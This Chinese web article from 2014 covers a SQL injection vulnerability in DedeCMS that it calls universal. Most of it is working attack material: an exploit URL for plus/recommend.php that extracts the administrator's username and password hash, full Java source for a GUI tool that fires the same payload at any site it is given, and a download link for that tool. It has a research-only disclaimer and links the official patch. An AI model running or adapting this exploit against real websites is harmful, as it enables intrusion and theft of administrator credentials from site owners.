DedeCMS全版本通杀SQL注入漏洞利用代码及工具2014年2月28日
dedecms即织梦(PHP开源网站内容管理系统)。织梦内容管理系统(DedeCms) 以简单、实用、开源而闻名,是国内最知名的PHP开源网站管理系统,也是使用用户最多的PHP类CMS系统。 <br /><br /><p align="center"><img alt="" src="https://img.jbzj.com/file_images/article/201402/20140228194228.jpg" /></p>
<br /><br />近日,网友在dedecms中发现了全版本通杀的SQL注入漏洞,目前官方最新版已修复该漏洞,相关利用代码如下: <br /><br />EXP: <br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode80"> <br />http://*.*.com/plus/recommend.php?action=&aid=1&_FILES=\' or mid=@`\'` /*!50000union*//*!50000select*/1,2,3,(select CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin` limit+0,1),5,6,7,8,9%23@`\'`+&_FILES=1.jpg&_FILES=application/octet-stream&_FILES=111 <br /></div><br /><br />直接获取就可以得到管理员的用户名与加密后的密码,效果如下图所示<br /><br />
<p align="center"><img alt="" src="https://img.jbzj.com/file_images/article/201402/20140228194228.gif" /></p>
<br /><br />利用工具源码(by 园长): <br /><br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode81"><br />package org.javaweb.dede.ui;<br /><br />import java.awt.Toolkit;<br />import java.io.BufferedReader;<br />import java.io.InputStreamReader;<br />import java.net.URL;<br />import java.util.regex.Matcher;<br />import java.util.regex.Pattern;<br /><br />/**<br /> *<br /> * @author yz<br /> */<br />public class MainFrame extends javax.swing.JFrame {<br /><br /> private static final long serialVersionUID = 1L;<br /><br /> /**<br /> * Creates new form MainFrame<br /> */<br /> public MainFrame() {<br /> initComponents();<br /> }<br /><br /> public String request(String url){<br /> String str = "",tmp;<br /> try {<br /> BufferedReader br = new BufferedReader(new InputStreamReader(new URL(url).openStream()));<br /> while((tmp=br.readLine())!=null){<br /> str+=tmp+"\r\n";<br /> }<br /> } catch (Exception e) {<br /> jTextArea1.setText(e.toString());<br /> }<br /> return str;<br /> }<br /><br /> private void initComponents() {<br /><br /> jPanel1 = new javax.swing.JPanel();<br /> jLabel1 = new javax.swing.JLabel();<br /> jTextField1 = new javax.swing.JTextField();<br /> jButton1 = new javax.swing.JButton();<br /> jScrollPane1 = new javax.swing.JScrollPane();<br /> jTextArea1 = new javax.swing.JTextArea();<br /><br /> setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);<br /><br /> jLabel1.setText("URL:");<br /> jTextField1.setText("<a href="http://localhost">http://localhost</a>");<br /><br /> this.setTitle("DedeCms recommend.php注入利用工具-p2j.cn");<br /><br /> int screenWidth = Toolkit.getDefaultToolkit().getScreenSize().width;<br /> int screenHeight = Toolkit.getDefaultToolkit().getScreenSize().height;<br /> this.setBounds(screenWidth / 2 - 229, screenHeight / 2 - 158, 458, 316);<br /><br /> jButton1.setText("获取");<br /> jButton1.addActionListener(new java.awt.event.ActionListener() {<br /> public void actionPerformed(java.awt.event.ActionEvent evt) {<br /> jButton1ActionPerformed(evt);<br /> }<br /> });<br /><br /> jTextArea1.setColumns(20);<br /> jTextArea1.setRows(5);<br /> jScrollPane1.setViewportView(jTextArea1);<br /><br /> javax.swing.GroupLayout jPanel1Layout = new javax.swing.GroupLayout(jPanel1);<br /> jPanel1.setLayout(jPanel1Layout);<br /> jPanel1Layout.setHorizontalGroup(<br /> jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)<br /> .addGroup(jPanel1Layout.createSequentialGroup()<br /> .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.TRAILING, false)<br /> .addComponent(jScrollPane1, javax.swing.GroupLayout.Alignment.LEADING)<br /> .addGroup(javax.swing.GroupLayout.Alignment.LEADING, jPanel1Layout.createSequentialGroup()<br /> .addContainerGap()<br /> .addComponent(jLabel1)<br /> .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)<br /> .addComponent(jTextField1, javax.swing.GroupLayout.PREFERRED_SIZE, 331, javax.swing.GroupLayout.PREFERRED_SIZE)<br /> .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)<br /> .addComponent(jButton1, javax.swing.GroupLayout.PREFERRED_SIZE, 83, javax.swing.GroupLayout.PREFERRED_SIZE)))<br /> .addGap(0, 0, Short.MAX_VALUE))<br /> );<br /> jPanel1Layout.setVerticalGroup(<br /> jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)<br /> .addGroup(jPanel1Layout.createSequentialGroup()<br /> .addContainerGap()<br /> .addGroup(jPanel1Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE)<br /> .addComponent(jLabel1)<br /> .addComponent(jTextField1,<br /> javax.swing.GroupLayout.PREFERRED_SIZE, <br />javax.swing.GroupLayout.DEFAULT_SIZE, <br />javax.swing.GroupLayout.PREFERRED_SIZE)<br /> .addComponent(jButton1))<br /> .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.RELATED)<br /> .addComponent(jScrollPane1, javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.MAX_VALUE))<br /> );<br /><br /> javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane());<br /> getContentPane().setLayout(layout);<br /> layout.setHorizontalGroup(<br /> layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)<br /> .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)<br /> );<br /> layout.setVerticalGroup(<br /> layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING)<br /> .addComponent(jPanel1, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)<br /> );<br /><br /> pack();<br /> }// </editor-fold> <br /><br /> private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) { <br /> String url = jTextField1.getText();<br /> if(null==url||"".equals(url)){<br /> return ;<br /> }<br /> String result = request(url+"/plus/recommend.php?action=&aid=1&_FILES=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES=1.jpg&_FILES=application/octet-stream&_FILES=4294");<br /> Matcher m = Pattern.compile("<h2>(.*)</h2>").matcher(result);<br /> if(m.find()){<br /> String[] s = m.group(1).split("\\|");<br /> if(s.length>2){<br /> jTextArea1.setText("UserName:"+s+"\r\nMD5:"+s.substring(3,s.length()-1));<br /> }<br /> }<br /> } <br /><br /> public static void main(String args[]) {<br /> java.awt.EventQueue.invokeLater(new Runnable() {<br /> public void run() {<br /> new MainFrame().setVisible(true);<br /> }<br /> });<br /> }<br /><br /> // Variables declaration - do not modify <br /> private javax.swing.JButton jButton1;<br /> private javax.swing.JLabel jLabel1;<br /> private javax.swing.JPanel jPanel1;<br /> private javax.swing.JScrollPane jScrollPane1;<br /> private javax.swing.JTextArea jTextArea1;<br /> private javax.swing.JTextField jTextField1;<br /> // End of variables declaration <br />}<br /></div><br /><br />利用工具下载地址 http://pan.baidu.com/s/1i37LUnF (本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!)<br /><br /><img src="https://img.jbzj.com/file_images/article/201402/20140228194229.jpg" alt="" /><br /><br />dedecms官方补丁地址: http://www.dedecms.com/pl/
頁:
[1]